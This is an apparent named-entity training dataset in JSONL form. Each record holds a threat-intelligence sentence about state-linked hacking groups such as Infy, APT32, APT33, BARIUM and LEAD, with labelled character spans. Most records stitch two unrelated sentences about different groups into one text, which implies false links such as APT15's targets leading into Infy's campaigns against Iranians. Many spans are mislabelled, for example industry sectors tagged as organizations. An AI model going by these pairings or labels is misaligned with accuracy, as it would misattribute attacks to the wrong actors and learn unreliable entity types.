{"text": "traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . Thanks to information we have been able to collect during the course of our research , such as characteristics of the group 's malware and development cycle , our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state .", "spans": [{"start": 27, "end": 36, "label": "Organization"}, {"start": 39, "end": 45, "label": "Organization"}, {"start": 48, "end": 58, "label": "Organization"}, {"start": 61, "end": 70, "label": "Organization"}, {"start": 73, "end": 92, "label": "Organization"}, {"start": 99, "end": 108, "label": "Organization"}, {"start": 111, "end": 124, "label": "Organization"}, {"start": 127, "end": 141, "label": "Organization"}, {"start": 353, "end": 357, "label": "Organization"}]}
{"text": "The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors . Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 97, "end": 106, "label": "Organization"}, {"start": 109, "end": 115, "label": "Organization"}, {"start": 118, "end": 128, "label": "Organization"}, {"start": 131, "end": 140, "label": "Organization"}, {"start": 143, "end": 162, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 177, "end": 190, "label": "Organization"}, {"start": 193, "end": 207, "label": "Organization"}, {"start": 351, "end": 364, "label": "Organization"}]}
{"text": "The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . Until the publication of the Palo Alto report , the developers of the Infy appeared to be actively updating and maintaining the codebase , and new releases were distributed to existing , as well as new , targets quite regularly .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 98, "end": 107, "label": "Organization"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 119, "end": 129, "label": "Organization"}, {"start": 132, "end": 141, "label": "Organization"}, {"start": 144, "end": 163, "label": "Organization"}, {"start": 170, "end": 179, "label": "Organization"}, {"start": 182, "end": 195, "label": "Organization"}, {"start": 198, "end": 212, "label": "Organization"}, {"start": 244, "end": 253, "label": "Organization"}, {"start": 285, "end": 289, "label": "Malware"}]}
{"text": "APT15 was targeting information related to UK government departments and military technology . Other samples were found bearing a compilation time as early as June 2012 and version 00002 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 46, "end": 56, "label": "Organization"}, {"start": 73, "end": 92, "label": "Organization"}]}
{"text": "APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 30, "end": 44, "label": "Organization"}, {"start": 159, "end": 171, "label": "Organization"}, {"start": 174, "end": 196, "label": "Organization"}, {"start": 199, "end": 207, "label": "Organization"}, {"start": 279, "end": 287, "label": "Organization"}]}
{"text": "cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally . When activities targeting of civil society subsided , the actors instead appeared to have focused on external targets , such a series of attempts to spearphish the Danish Ministry of Foreign Affairs .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 47, "end": 52, "label": "Organization"}, {"start": 55, "end": 64, "label": "Organization"}, {"start": 67, "end": 76, "label": "Organization"}, {"start": 83, "end": 114, "label": "Organization"}, {"start": 180, "end": 193, "label": "Organization"}]}
{"text": "According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries . Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials .", "spans": [{"start": 45, "end": 64, "label": "Organization"}, {"start": 88, "end": 105, "label": "System"}, {"start": 131, "end": 140, "label": "Organization"}, {"start": 143, "end": 161, "label": "Organization"}, {"start": 168, "end": 186, "label": "Organization"}, {"start": 189, "end": 207, "label": "Organization"}, {"start": 379, "end": 383, "label": "Malware"}, {"start": 388, "end": 395, "label": "Malware"}, {"start": 431, "end": 435, "label": "Malware"}, {"start": 438, "end": 443, "label": "Malware"}, {"start": 446, "end": 453, "label": "Malware"}, {"start": 487, "end": 496, "label": "Malware"}]}
{"text": "McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications . Our observation of Infy 's campaigns , primarily through the lens of spearphishing attacks against Iranian civil society and media organizations , indicates a wandering focus on particular demographics on a strategic basis over time .", "spans": [{"start": 0, "end": 31, "label": "Organization"}, {"start": 143, "end": 166, "label": "Organization"}, {"start": 169, "end": 182, "label": "Organization"}, {"start": 185, "end": 192, "label": "Organization"}, {"start": 195, "end": 206, "label": "Organization"}, {"start": 213, "end": 231, "label": "Organization"}, {"start": 341, "end": 354, "label": "Organization"}, {"start": 359, "end": 378, "label": "Organization"}]}
{"text": "Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": [{"start": 22, "end": 41, "label": "Organization"}, {"start": 67, "end": 82, "label": "System"}, {"start": 109, "end": 119, "label": "Organization"}, {"start": 122, "end": 131, "label": "Organization"}, {"start": 134, "end": 144, "label": "Organization"}, {"start": 151, "end": 167, "label": "Organization"}, {"start": 174, "end": 178, "label": "Malware"}, {"start": 179, "end": 186, "label": "Malware"}, {"start": 206, "end": 214, "label": "Organization"}, {"start": 294, "end": 314, "label": "Organization"}, {"start": 318, "end": 329, "label": "Organization"}, {"start": 364, "end": 374, "label": "System"}]}
{"text": "Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . Based on information collected in the course of this research , the targets and victims of Infy 's campaigns have continued to be strongly aligned with Iran 's \" soft war \" agenda , internal security policies , and regional adversaries of the hardline establishment of the Islamic Republic of Iran .", "spans": [{"start": 42, "end": 50, "label": "System"}, {"start": 57, "end": 61, "label": "System"}, {"start": 69, "end": 80, "label": "System"}, {"start": 258, "end": 276, "label": "Organization"}, {"start": 279, "end": 287, "label": "Organization"}, {"start": 290, "end": 307, "label": "Organization"}, {"start": 310, "end": 322, "label": "Organization"}, {"start": 327, "end": 349, "label": "Organization"}]}
{"text": "Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . Until late December 2015 , in nearly every Infy message documented since our tracking began in May 2013 , no attempt included strong tailoring of the approach , often not even including an email body , instead relying on cryptic filenames and email subjects to attract interest .", "spans": [{"start": 42, "end": 50, "label": "System"}, {"start": 57, "end": 61, "label": "System"}, {"start": 69, "end": 80, "label": "System"}, {"start": 258, "end": 276, "label": "Organization"}, {"start": 279, "end": 287, "label": "Organization"}, {"start": 290, "end": 307, "label": "Organization"}, {"start": 310, "end": 322, "label": "Organization"}, {"start": 327, "end": 349, "label": "Organization"}, {"start": 410, "end": 422, "label": "Malware"}]}
{"text": "Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": [{"start": 21, "end": 30, "label": "Organization"}, {"start": 57, "end": 74, "label": "Organization"}, {"start": 81, "end": 100, "label": "Organization"}, {"start": 103, "end": 125, "label": "Organization"}, {"start": 132, "end": 145, "label": "Organization"}, {"start": 258, "end": 276, "label": "Organization"}, {"start": 354, "end": 369, "label": "Organization"}]}
{"text": "Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": [{"start": 29, "end": 43, "label": "Organization"}, {"start": 132, "end": 149, "label": "Organization"}, {"start": 152, "end": 160, "label": "Organization"}, {"start": 165, "end": 179, "label": "Organization"}, {"start": 182, "end": 195, "label": "Organization"}, {"start": 198, "end": 205, "label": "Organization"}, {"start": 208, "end": 226, "label": "Organization"}, {"start": 233, "end": 254, "label": "Organization"}, {"start": 378, "end": 395, "label": "Organization"}, {"start": 440, "end": 465, "label": "Organization"}]}
{"text": "Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research . The actors successfully compromised a host of an Saudi government institutions on January 17 , 2016 , and maintained access for at least two weeks .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 84, "end": 96, "label": "Organization"}, {"start": 180, "end": 203, "label": "Organization"}]}
{"text": "APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . The Infy group also appears to engage in espionage activities against foreign governments and businesses .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 152, "end": 162, "label": "Organization"}, {"start": 226, "end": 237, "label": "Organization"}, {"start": 242, "end": 252, "label": "Organization"}]}
{"text": "Lotus Blossom targeted the government , higher education , and high tech companies . In order to initially compromise the designated targets , Infy typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 27, "end": 37, "label": "Organization"}, {"start": 40, "end": 56, "label": "Organization"}, {"start": 63, "end": 82, "label": "Organization"}, {"start": 222, "end": 226, "label": "Malware"}]}
{"text": "The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies . In order to initially compromise the designated targets , the attackers typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 34, "end": 42, "label": "Organization"}, {"start": 46, "end": 56, "label": "Organization"}, {"start": 78, "end": 94, "label": "Organization"}, {"start": 99, "end": 118, "label": "Organization"}, {"start": 267, "end": 271, "label": "Malware"}]}
{"text": "Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia . On May 2 , 2016 , Palo Alto Networks published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": [{"start": 21, "end": 31, "label": "Organization"}, {"start": 34, "end": 40, "label": "Organization"}, {"start": 47, "end": 65, "label": "Organization"}, {"start": 192, "end": 210, "label": "Organization"}, {"start": 321, "end": 325, "label": "Organization"}]}
{"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents . Prior to the distribution of new versions of the agent , the Infy developers appear to consistently conduct tests from local hosts , which indicates that the control and maintenance of the software occurs in the Khorasan Razavi province of Iran , potentially in the city of Mashhad .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 48, "end": 64, "label": "Organization"}, {"start": 80, "end": 100, "label": "Organization"}, {"start": 131, "end": 150, "label": "Organization"}, {"start": 153, "end": 164, "label": "Organization"}, {"start": 182, "end": 192, "label": "Organization"}, {"start": 256, "end": 260, "label": "Malware"}]}
{"text": "Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors . On May 2 , 2016 , Palo Alto published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 47, "end": 63, "label": "Organization"}, {"start": 68, "end": 106, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}]}
{"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments . Only one client , based in Iran , continued to communicate with the infrastructure .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 48, "end": 64, "label": "Organization"}, {"start": 80, "end": 100, "label": "Organization"}, {"start": 109, "end": 120, "label": "Organization"}]}
{"text": "Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets . A researcher has attributed a recently publicized attack on Citrix' internal network to the Iranian-linked group known as IRIDIUM \u2013 and said that the data heist involved 6 terabytes of sensitive data .", "spans": [{"start": 44, "end": 49, "label": "Organization"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 180, "end": 190, "label": "Organization"}, {"start": 260, "end": 267, "label": "Organization"}]}
{"text": "The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . \" IRIDIUM has hit more than 200 government agencies , oil and gas companies and technology companies , including Citrix Systems Inc \" , they said .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 78, "end": 87, "label": "Organization"}, {"start": 90, "end": 100, "label": "Organization"}, {"start": 103, "end": 109, "label": "Organization"}, {"start": 112, "end": 120, "label": "Organization"}, {"start": 123, "end": 141, "label": "Organization"}, {"start": 197, "end": 216, "label": "Organization"}, {"start": 219, "end": 222, "label": "Organization"}, {"start": 227, "end": 240, "label": "Organization"}, {"start": 245, "end": 265, "label": "Organization"}, {"start": 278, "end": 296, "label": "Organization"}]}
{"text": "APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East . Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week \u2013 but it wouldn't confirm the other details in Resecurity 's post , including the attribution .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 24, "end": 32, "label": "Organization"}, {"start": 35, "end": 45, "label": "Organization"}, {"start": 50, "end": 60, "label": "Organization"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 71, "end": 77, "label": "Organization"}, {"start": 80, "end": 91, "label": "Organization"}, {"start": 94, "end": 111, "label": "Organization"}, {"start": 116, "end": 142, "label": "Organization"}, {"start": 173, "end": 179, "label": "Organization"}, {"start": 327, "end": 337, "label": "Organization"}]}
{"text": "APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors . In wake of these events , a security firm Resecurity reached out to NBC news and claimed that they had reasons to believe that the attacks were carried out by Iranian-linked group known as IRIDIUM .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 52, "end": 60, "label": "Organization"}, {"start": 63, "end": 73, "label": "Organization"}, {"start": 78, "end": 98, "label": "Organization"}, {"start": 101, "end": 114, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 130, "end": 136, "label": "Organization"}, {"start": 141, "end": 164, "label": "Organization"}, {"start": 167, "end": 170, "label": "Organization"}, {"start": 179, "end": 190, "label": "Organization"}, {"start": 193, "end": 210, "label": "Organization"}, {"start": 215, "end": 241, "label": "Organization"}, {"start": 272, "end": 285, "label": "Organization"}, {"start": 286, "end": 296, "label": "Organization"}]}
{"text": "Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . Resecurity says that IRIDIUM \" has hit more than 200 government agencies , oil and gas companies , and technology companies including Citrix .", "spans": [{"start": 34, "end": 46, "label": "Organization"}, {"start": 52, "end": 59, "label": "Organization"}, {"start": 70, "end": 75, "label": "Organization"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 158, "end": 167, "label": "Organization"}, {"start": 172, "end": 199, "label": "Organization"}, {"start": 202, "end": 212, "label": "Organization"}, {"start": 255, "end": 274, "label": "Organization"}, {"start": 277, "end": 280, "label": "Organization"}, {"start": 285, "end": 298, "label": "Organization"}, {"start": 305, "end": 325, "label": "Organization"}, {"start": 336, "end": 342, "label": "Organization"}]}
{"text": "Since at least 2013 , the Iranian threat group FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . Resecurity claims that IRIDIUM breached Citrix 's network during December 2018 .", "spans": [{"start": 34, "end": 46, "label": "Organization"}, {"start": 47, "end": 54, "label": "Organization"}, {"start": 65, "end": 70, "label": "Organization"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 153, "end": 162, "label": "Organization"}, {"start": 167, "end": 194, "label": "Organization"}, {"start": 197, "end": 207, "label": "Organization"}, {"start": 237, "end": 243, "label": "Organization"}]}
{"text": "Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks . Infy engaged in malware spearphishing against the same targets as Flying Kitten from the outset of its campaign ; Operation Cleaver has registered several resources related to development agencies that have been the subject of intrusion attempts by others since February 2014 .", "spans": [{"start": 13, "end": 18, "label": "Organization"}, {"start": 68, "end": 88, "label": "Organization"}, {"start": 195, "end": 199, "label": "Malware"}, {"start": 371, "end": 391, "label": "Organization"}]}
{"text": "Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . The malicious samples we found are the early stage malware most often delivered by spear-phishing e-mails .", "spans": [{"start": 64, "end": 76, "label": "Organization"}, {"start": 110, "end": 121, "label": "Malware"}, {"start": 126, "end": 156, "label": "Malware"}]}
{"text": "COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name \u2014 either KBDLV2.DLL or AUTO.DLL , depending on the malware sample .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 46, "end": 64, "label": "Organization"}, {"start": 67, "end": 77, "label": "Organization"}, {"start": 80, "end": 87, "label": "Organization"}, {"start": 90, "end": 93, "label": "Organization"}, {"start": 100, "end": 132, "label": "Organization"}, {"start": 191, "end": 209, "label": "Organization"}, {"start": 218, "end": 230, "label": "Organization"}, {"start": 312, "end": 319, "label": "System"}, {"start": 366, "end": 376, "label": "Indicator"}, {"start": 380, "end": 388, "label": "Indicator"}]}
{"text": "The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents . At this stage , the malware gathers information about the infected computer .", "spans": [{"start": 36, "end": 48, "label": "Organization"}, {"start": 79, "end": 88, "label": "Organization"}]}
{"text": "We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . Hancom Office is widely used in South Korea .", "spans": [{"start": 14, "end": 25, "label": "Malware"}]}
{"text": "This group has used a large array of infection vectors , mostly revolving around drive-by downloads and spam . Perhaps it also points to the suspected North Korean origin of attack .", "spans": [{"start": 5, "end": 10, "label": "Organization"}]}
{"text": "To infect individuals with access to the data the actors desire , Scarlet Mimic deploys both spear-phishing and watering hole ( strategic web compromise ) attacks . The attacker is from North Korea .", "spans": [{"start": 50, "end": 56, "label": "Organization"}, {"start": 66, "end": 79, "label": "Organization"}]}
{"text": "As with many other attackers who use spear-phishing to infect victims , Scarlet Mimic makes heavy use of \" decoy \" files . All of them lie in ranges of the Jilin Province Network and Liaoning Province Network , in China .", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 72, "end": 85, "label": "Organization"}]}
{"text": "The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin . Finally , this geo-location supports the likely theory that the attackers behind Kimsuky are based in North Korea .", "spans": [{"start": 96, "end": 101, "label": "Organization"}, {"start": 137, "end": 153, "label": "Organization"}, {"start": 334, "end": 341, "label": "Organization"}]}
{"text": "Using these tactics Scarlet Mimic can directly target previously identified individuals ( spear phishing ) as well as unidentified individuals who are interested in a specific subject ( watering hole ) . In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD .", "spans": [{"start": 20, "end": 33, "label": "Organization"}, {"start": 234, "end": 240, "label": "Malware"}, {"start": 241, "end": 248, "label": "Malware"}, {"start": 294, "end": 300, "label": "Organization"}]}
{"text": "Scarlet Mimic primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate 's network as early as February 2016 .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 196, "end": 220, "label": "Malware"}]}
{"text": "Scarlet Mimic has carried out attacks using both spear-phishing and watering holes since at least 2009 with increasingly advanced malware , and has deployed malware to attack multiple operating systems and platforms . In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 293, "end": 299, "label": "Malware"}, {"start": 304, "end": 310, "label": "Malware"}, {"start": 315, "end": 319, "label": "Malware"}]}
{"text": "The group primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 175, "end": 181, "label": "Malware"}, {"start": 188, "end": 194, "label": "Malware"}, {"start": 199, "end": 203, "label": "Malware"}]}
{"text": "When using email scams , SilverTerrier actors preferred to use large target audiences , which maximized the likelihood of success with very little risk . To show how this breach and similar breaches can be mitigated , we look at how Windows Defender ATP flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups .", "spans": [{"start": 25, "end": 45, "label": "Organization"}, {"start": 233, "end": 253, "label": "Organization"}]}
{"text": "The malware may inject itself into browser processes and explorer.exe . BARIUM begins its attacks by cultivating relationships with potential victims\u2014particularly those working in Business Development or Human Resources\u2014on various social media platforms .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 57, "end": 69, "label": "Malware"}, {"start": 231, "end": 243, "label": "Organization"}]}
{"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans .", "spans": [{"start": 44, "end": 59, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}]}
{"text": "In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . Initial intrusion stages feature the Win32/Barlaiy implant\u2014notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 48, "end": 64, "label": "Malware"}, {"start": 185, "end": 198, "label": "Malware"}, {"start": 309, "end": 312, "label": "System"}]}
{"text": "APT32 actors continue to deliver the malicious attachments via spear-phishing emails . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 37, "end": 58, "label": "Malware"}, {"start": 188, "end": 195, "label": "Malware"}, {"start": 250, "end": 254, "label": "Indicator"}]}
{"text": "In the following weeks , FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures . Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": [{"start": 25, "end": 32, "label": "Organization"}, {"start": 159, "end": 166, "label": "Organization"}, {"start": 227, "end": 233, "label": "System"}, {"start": 236, "end": 252, "label": "Malware"}]}
{"text": "FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware . Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months ( Figure 1 ) .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 10, "end": 21, "label": "Organization"}, {"start": 131, "end": 150, "label": "Organization"}, {"start": 162, "end": 168, "label": "Malware"}]}
{"text": "The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . Instead , Lead often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 168, "end": 187, "label": "System"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 260, "end": 266, "label": "System"}, {"start": 269, "end": 285, "label": "Malware"}]}
{"text": "The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 32, "end": 44, "label": "Organization"}, {"start": 487, "end": 503, "label": "Malware"}]}
{"text": "Another common step taken by threat actors is changing their system's MAC Address to avoid being uniquely identified . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": [{"start": 36, "end": 42, "label": "Organization"}, {"start": 205, "end": 208, "label": "System"}, {"start": 211, "end": 228, "label": "Indicator"}, {"start": 253, "end": 256, "label": "System"}, {"start": 265, "end": 285, "label": "Indicator"}]}
{"text": "The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor . Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ACTs .", "spans": [{"start": 149, "end": 157, "label": "Malware"}, {"start": 160, "end": 180, "label": "Organization"}, {"start": 265, "end": 269, "label": "Malware"}, {"start": 274, "end": 280, "label": "Malware"}]}
{"text": "FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns . The following examples were developed using a Winnti installer that was used in attacks in December 2016 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 184, "end": 200, "label": "Malware"}]}
{"text": "The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 134, "end": 146, "label": "Malware"}, {"start": 161, "end": 187, "label": "Malware"}, {"start": 223, "end": 243, "label": "Organization"}, {"start": 262, "end": 275, "label": "Organization"}]}
{"text": "To run its code in kernel mode in the most recent versions of operating systems , that have Driver Signature Enforcement , Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities . LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": [{"start": 123, "end": 132, "label": "System"}, {"start": 228, "end": 234, "label": "Organization"}, {"start": 305, "end": 318, "label": "Organization"}]}
{"text": "To date , all observed Snake Wine 's attacks were the result of spear phishing attempts against the victim organizations . And , finally , with the upcoming Creators Update , Windows Defender ATP will provide additional capabilities for detecting threats such as Winnti , as well as centralized response options , such as machine isolation and file blocking , that will enable fast containment of known attack jump off points .", "spans": [{"start": 23, "end": 33, "label": "Organization"}, {"start": 157, "end": 172, "label": "Malware"}, {"start": 175, "end": 195, "label": "Organization"}, {"start": 263, "end": 269, "label": "Malware"}]}
{"text": "Beginning in mid-January 2019 , TA542 distributed millions of Emotet-laden emails in both English and German . The police suspected Lurk of stealing nearly three billion rubles , using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations , including banks .", "spans": [{"start": 132, "end": 136, "label": "Malware"}, {"start": 272, "end": 296, "label": "Organization"}, {"start": 309, "end": 314, "label": "Organization"}]}
{"text": "Proofpoint researchers observed one DanaBot affiliate ( Affid 11 ) specifically targeting Canada with \" Canada Post \" themed lures between January 1 and May 1 , 2019 . When we first encountered Lurk , in 2011 , it was a nameless Trojan .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 36, "end": 43, "label": "System"}, {"start": 104, "end": 115, "label": "Organization"}, {"start": 194, "end": 198, "label": "Malware"}, {"start": 229, "end": 235, "label": "Malware"}]}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": [{"start": 28, "end": 48, "label": "Organization"}, {"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 237, "end": 250, "label": "Organization"}, {"start": 332, "end": 335, "label": "Indicator"}]}
{"text": "In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks .", "spans": [{"start": 163, "end": 183, "label": "Organization"}, {"start": 292, "end": 294, "label": "Organization"}, {"start": 333, "end": 355, "label": "Organization"}]}
{"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . In most cases , the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash .", "spans": [{"start": 124, "end": 135, "label": "Organization"}]}
{"text": "In this latest incident , Transparent Tribe registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . We were soon able to help investigate another incident involving Lurk .", "spans": [{"start": 171, "end": 191, "label": "Organization"}, {"start": 275, "end": 279, "label": "Malware"}]}
